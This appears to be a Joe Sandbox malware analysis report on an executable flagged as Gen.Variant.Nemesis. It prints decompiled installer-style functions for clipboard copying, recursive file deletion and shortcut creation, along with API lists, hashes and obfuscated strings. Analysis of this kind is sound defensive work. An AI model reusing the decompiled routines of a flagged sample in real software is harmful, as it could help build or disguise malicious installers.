API String ID: 2488574733-3592374750
Opcode ID: d39332670e42baa2e4338040fdf84325205f2ee1dee207f194f6fe0ff4ed9f93
Instruction ID: 7b86b6c626ebcb02b9d5dbe90ebec93722fb19806190c38ba91b5de258dcc2d7
Opcode Fuzzy Hash: d39332670e42baa2e4338040fdf84325205f2ee1dee207f194f6fe0ff4ed9f93
Instruction Fuzzy Hash: 0CD12571500310ABD720BF759D45A2B3AACEB4070AF11487FF981B62E1DB7D8E45876E

Uniqueness

Uniqueness Score: -1.00%

Function 00405425 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00405425(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x433ec4;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E004053B9, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						CloseHandle(_t127); // executed
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004062A4(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x42d248;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x433eac == _t156) {
							ShowWindow( *0x434ee8, 8);
							if( *0x434f8c == _t156) {
								_t119 =  *0x42c220; // 0x6ccd6c
								_t57 = _t119 + 0x34; // 0xffffffd5
								E004052E6( *_t57, _t156);
							}
							E004041F0(_t171);
							goto L25;
						}
						 *0x42ba18 = 2;
						E004041F0(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040427E(_a8, _a12, _a16);
						}
						ShowWindow( *0x433eb0, _t156);
						ShowWindow(_t169, 8);
						E0040424C(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x434ef4;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x433eb0 = GetDlgItem(_a4, 0x403);
				 *0x433ea8 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x433ec4 = _t134;
				_v8 = _t134;
				E0040424C( *0x433eb0);
				 *0x433eb4 = E00404B83(4);
				 *0x433ecc = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404217(_a4);
				if(( *0x434efc & 0x00000003) != 0) {
					ShowWindow( *0x433eb0, _t156); // executed
					if(( *0x434efc & 0x00000002) != 0) {
						 *0x433eb0 = _t156;
					} else {
						ShowWindow(_v8, 8); // executed
					}
					E0040424C( *0x433ea8);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x434efc & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

0x0040542d
0x00405433
0x0040543d
0x00405440
0x004055d6
0x004055f3
0x004055fa
0x004055fa
0x0040560d
0x0040562b
0x0040562d
0x00405635
0x0040568b
0x0040568f
0x00000000
0x00000000
0x00405691
0x00405697
0x00000000
0x00000000
0x004056a1
0x004056a9
0x004056ac
0x004057ae
0x00000000
0x004057ae
0x004056bb
0x004056c6
0x004056cf
0x004056da
0x004056dd
0x004056e6
0x004056ec
0x004056ef
0x004056ef
0x00405707
0x00405710
0x00405713
0x0040571a
0x00405721
0x00405729
0x00405729
0x00405740
0x00405740
0x00405747
0x0040574d
0x00405759
0x00405760
0x00405769
0x0040576b
0x0040576e
0x0040577d
0x00405780
0x00405786
0x00405787
0x0040578d
0x0040578e
0x0040578f
0x00405797
0x004057a2
0x004057a8
0x004057a8
0x00000000
0x00405707
0x0040563d
0x0040566d
0x00405675
0x00405677
0x0040567d
0x00405680
0x00405680
0x00405686
0x00000000
0x00405686
0x00405641
0x0040564b
0x00000000
0x0040560f
0x00405615
0x00405650
0x00000000
0x00405659
0x0040561e
0x00405623
0x00405626
0x00000000
0x00405626
0x0040560d
0x00405446
0x0040544a
0x00405452
0x00405456
0x00405459
0x0040545c
0x0040545f
0x00405462
0x00405463
0x00405464
0x0040547d
0x00405480
0x0040548a
0x00405499
0x004054a1
0x004054a9
0x004054ae
0x004054b1
0x004054bd
0x004054c6
0x004054cf
0x004054f1
0x004054f7
0x00405508
0x0040550d
0x0040551b
0x00405529
0x00405529
0x0040552e
0x0040553c
0x0040553c
0x00405541
0x00405544
0x00405549
0x00405555
0x0040555e
0x0040556b
0x0040557a
0x0040556d
0x00405572
0x00405572
0x00405586
0x00405586
0x0040559a
0x004055a3
0x004055ac
0x004055bc
0x004055c8
0x004055c8
0x00000000

APIs

GetDlgItem.USER32(?,00000403), ref: 00405483
GetDlgItem.USER32(?,000003EE), ref: 00405492
GetClientRect.USER32(?,?), ref: 004054CF
GetSystemMetrics.USER32(00000002), ref: 004054D6
SendMessageW.USER32(?,00001061,00000000,?), ref: 004054F7
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405508
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040551B
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405529
SendMessageW.USER32(?,00001024,00000000,?), ref: 0040553C
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040555E
ShowWindow.USER32(?,00000008), ref: 00405572
GetDlgItem.USER32(?,000003EC), ref: 00405593
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A3
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055BC
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055C8
GetDlgItem.USER32(?,000003F8), ref: 004054A1

Part of subcall function 0040424C: SendMessageW.USER32(00000028,?,00000001,00404077), ref: 0040425A

GetDlgItem.USER32(?,000003EC), ref: 004055E5
CreateThread.KERNEL32(00000000,00000000,Function_000053B9,00000000), ref: 004055F3
CloseHandle.KERNELBASE(00000000), ref: 004055FA
ShowWindow.USER32(00000000), ref: 0040561E
ShowWindow.USER32(?,00000008), ref: 00405623
ShowWindow.USER32(00000008), ref: 0040566D
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A1
CreatePopupMenu.USER32 ref: 004056B2
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056C6
GetWindowRect.USER32(?,?), ref: 004056E6
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056FF
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405737
OpenClipboard.USER32(00000000), ref: 00405747
EmptyClipboard.USER32 ref: 0040574D
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405759
GlobalLock.KERNEL32(00000000), ref: 00405763
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405777
GlobalUnlock.KERNEL32(00000000), ref: 00405797
SetClipboardData.USER32(0000000D,00000000), ref: 004057A2
CloseClipboard.USER32 ref: 004057A8

Strings

{, xrefs: 0040568B

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 008adb25098ef1b1bb6e7edf5b259777504a6f11eb67abc6bb5002a761aaad34
Instruction ID: 2f82927f57e7d4f45bca6e23eab998b55dded590160266c2ba262d9988700e91
Opcode Fuzzy Hash: 008adb25098ef1b1bb6e7edf5b259777504a6f11eb67abc6bb5002a761aaad34
Instruction Fuzzy Hash: 37B16970800608BFDB119FA0DD89AAE7B79FB48355F00403AFA45B61A0CB759E51DF68

Uniqueness

Uniqueness Score: -1.00%

Function 02B73D96 Relevance: 21.9, Strings: 14, Instructions: 4363COMMON

Download Yara Rule

Strings

TW_, xrefs: 02B7808A
}wL, xrefs: 02B774A5
M}J, xrefs: 02B774FC
2H, xrefs: 02B79398
q)yb, xrefs: 02B7530A
66, xrefs: 02B75640
>tFy, xrefs: 02B77D28
@, xrefs: 02B74E89
I*x, xrefs: 02B773F4
T4b, xrefs: 02B75FB1
.Z/, xrefs: 02B7454F
Hj#, xrefs: 02B74654
[Bg+, xrefs: 02B76838
NmE, xrefs: 02B77AC2

Memory Dump Source

Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: 66$>tFy$Hj#$I*x$M}J$T4b$TW_$[Bg+$q)yb$}wL$.Z/$2H$NmE$@
API String ID: 0-1650154920
Opcode ID: 7de764ecea91044ada11bc028ad7d39e642eb466e6ad2b07a4c054e9c77d1f33
Instruction ID: 41260d22ed297fa6a6f8c93dda6815e416c38c6cdbbfe2e948447276a37c3835
Opcode Fuzzy Hash: 7de764ecea91044ada11bc028ad7d39e642eb466e6ad2b07a4c054e9c77d1f33
Instruction Fuzzy Hash: 82831175500347CFDB265E38CA6A3DABB72EF533A0F9541AACC869B664D33505C6CB02

Uniqueness

Uniqueness Score: -1.00%

Function 00405990 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405990(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405C5B(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x434f88 =  *0x434f88 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406282(0x42f250, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405B9F(_t68);
					} else {
						lstrcatW(0x42f250, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x42f250,  &_v604);
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406282(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405948(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004052E6(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x434f88 =  *0x434f88 + 1;
										} else {
											E004052E6(0xfffffff1, _t68);
											E00406048(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405990(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x42f250 - 0x5c;
					if( *0x42f250 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E004065C5(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405B53(_t68);
							_t38 = E00405948(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004052E6(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004052E6(0xfffffff1, _t68);
							return E00406048(_t67, _t68, 0);
						}
						L30:
						 *0x434f88 =  *0x434f88 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x0040599a
0x0040599f
0x004059a8
0x004059ab
0x004059b3
0x004059b6
0x004059b9
0x004059c1
0x004059c3
0x004059c4
0x00000000
0x004059c4
0x004059cf
0x004059d2
0x004059d2
0x004059d2
0x004059d6
0x004059e9
0x004059f0
0x004059f5
0x004059f9
0x00405a09
0x004059fb
0x00405a01
0x00405a01
0x00405a0e
0x00405a12
0x00405a1e
0x00405a24
0x00405a29
0x00405a2f
0x00405a3a
0x00405a40
0x00405a42
0x00405a45
0x00405aef
0x00405aef
0x00405af3
0x00405af5
0x00405af5
0x00405af5
0x00405af5
0x00000000
0x00000000
0x00000000
0x00000000
0x00405a4b
0x00405a4b
0x00405a4b
0x00405a53
0x00405a73
0x00405a7b
0x00405a80
0x00405a87
0x00405aa2
0x00405aa7
0x00405aa9
0x00405acd
0x00405aab
0x00405aab
0x00405aae
0x00405ac2
0x00405ab0
0x00405ab3
0x00405abb
0x00405abb
0x00405aae
0x00405a89
0x00405a8f
0x00405a91
0x00405a97
0x00405a97
0x00405a91
0x00000000
0x00405a87
0x00405a55
0x00405a5d
0x00000000
0x00000000
0x00405a5f
0x00405a67
0x00000000
0x00000000
0x00405a69
0x00405a71
0x00000000
0x00000000
0x00000000
0x00405ad2
0x00405ada
0x00405ae0
0x00405ae0
0x00405ae9
0x00000000
0x00405ae9
0x00405a14
0x00405a1c
0x00000000
0x00000000
0x00000000
0x004059d8
0x004059d8
0x004059da
0x00405afa
0x00405afc
0x00405aff
0x00405b50
0x00405b50
0x00405b50
0x00405b01
0x00405b04
0x00405b0f
0x00405b14
0x00405b16
0x00000000
0x00000000
0x00405b19
0x00405b25
0x00405b2a
0x00405b2c
0x00000000
0x00405b47
0x00405b2e
0x00405b31
0x00000000
0x00000000
0x00405b36
0x00000000
0x00405b3d
0x00405b06
0x00405b06
0x00000000
0x00405b06
0x004059e0
0x004059e3
0x00000000
0x00000000
0x00000000
0x004059e3

APIs

DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75523420,00000000), ref: 004059B9
lstrcatW.KERNEL32(0042F250,\*.*), ref: 00405A01
lstrcatW.KERNEL32(?,0040A014), ref: 00405A24
lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,75523420,00000000), ref: 00405A2A
FindFirstFileW.KERNEL32(0042F250,?,?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,75523420,00000000), ref: 00405A3A
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405ADA
FindClose.KERNEL32(00000000), ref: 00405AE9

Strings

\*.*, xrefs: 004059FB
C:\Users\user\AppData\Local\Temp\, xrefs: 0040599E
"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe", xrefs: 00405990

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-1714237646
Opcode ID: 7c40550cfb6058a41fac62682ca690ff842edb60165f8b14098a153ca22c4312
Instruction ID: f2c7612d72ec45a398f238805cdec5f3e53338685f49ce317d80e039c8d46841
Opcode Fuzzy Hash: 7c40550cfb6058a41fac62682ca690ff842edb60165f8b14098a153ca22c4312
Instruction Fuzzy Hash: 4E41C230A01A14AACB21AB658C89AAF7778DF81764F14427FF801711C1D77CA992DE6E

Uniqueness

Uniqueness Score: -1.00%

Function 004065C5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004065C5(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x430298); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2); // executed
				return 0x430298;
			}

0x004065d0
0x004065d9
0x00000000
0x004065e6
0x004065dc
0x00000000

APIs

FindFirstFileW.KERNELBASE(?,00430298,C:\,00405CA4,C:\,C:\,00000000,C:\,C:\,?,?,75523420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75523420), ref: 004065D0
FindClose.KERNELBASE(00000000), ref: 004065DC

Strings

C:\, xrefs: 004065C5

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\
API String ID: 2295610775-3404278061
Opcode ID: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
Instruction ID: c6d438537f48b5b2fd9a798109b403d1ef13146c040350fe47557a90c5bdf24f
Opcode Fuzzy Hash: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
Instruction Fuzzy Hash: E6D012315091206BC6551B387E0C84B7A589F153717258B37B86AF11E4C734CC628698

Uniqueness

Uniqueness Score: -1.00%

Function 004020FE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
comCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004020FE() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x4c)) = E00402C37(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x3c)) = E00402C37(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402C37(2);
				 *((intOrPtr*)(_t107 - 0x48)) = E00402C37(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402C37(0x45);
				_t52 =  *(_t107 - 0x18);
				 *(_t107 - 0x44) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x38) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405BCA( *((intOrPtr*)(_t107 - 0x3c))) == 0) {
					E00402C37(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4085e8, _t83, 1, 0x4085d8, _t56); // executed
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4085f8, _t107 - 0x30);
					 *((intOrPtr*)(_t107 - 0x10)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x3c)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Ligtorn\\Pantry\\Agrafferne");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x38));
						_t91 =  *((intOrPtr*)(_t107 - 0x48));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x44));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x30));
							 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x4c)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x30));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}

0x00402107
0x00402111
0x0040211b
0x00402125
0x00402130
0x00402133
0x0040214d
0x00402150
0x00402156
0x00402159
0x00402163
0x00402167
0x00402167
0x0040216c
0x0040217d
0x00402185
0x0040223c
0x0040223c
0x00402243
0x0040218b
0x0040218b
0x0040219a
0x0040219e
0x004021a1
0x004021a7
0x004021b5
0x004021b8
0x004021ba
0x004021c5
0x004021c5
0x004021ca
0x004021cc
0x004021d3
0x004021d3
0x004021d6
0x004021df
0x004021e2
0x004021e8
0x004021ea
0x004021f4
0x004021f4
0x004021f7
0x00402200
0x00402203
0x0040220c
0x00402212
0x00402214
0x00402222
0x00402222
0x00402225
0x0040222b
0x0040222b
0x0040222e
0x00402234
0x0040223a
0x0040224f
0x00000000
0x00000000
0x00000000
0x0040223a
0x00402245
0x00402ac2
0x00402ace

APIs

CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D

Strings

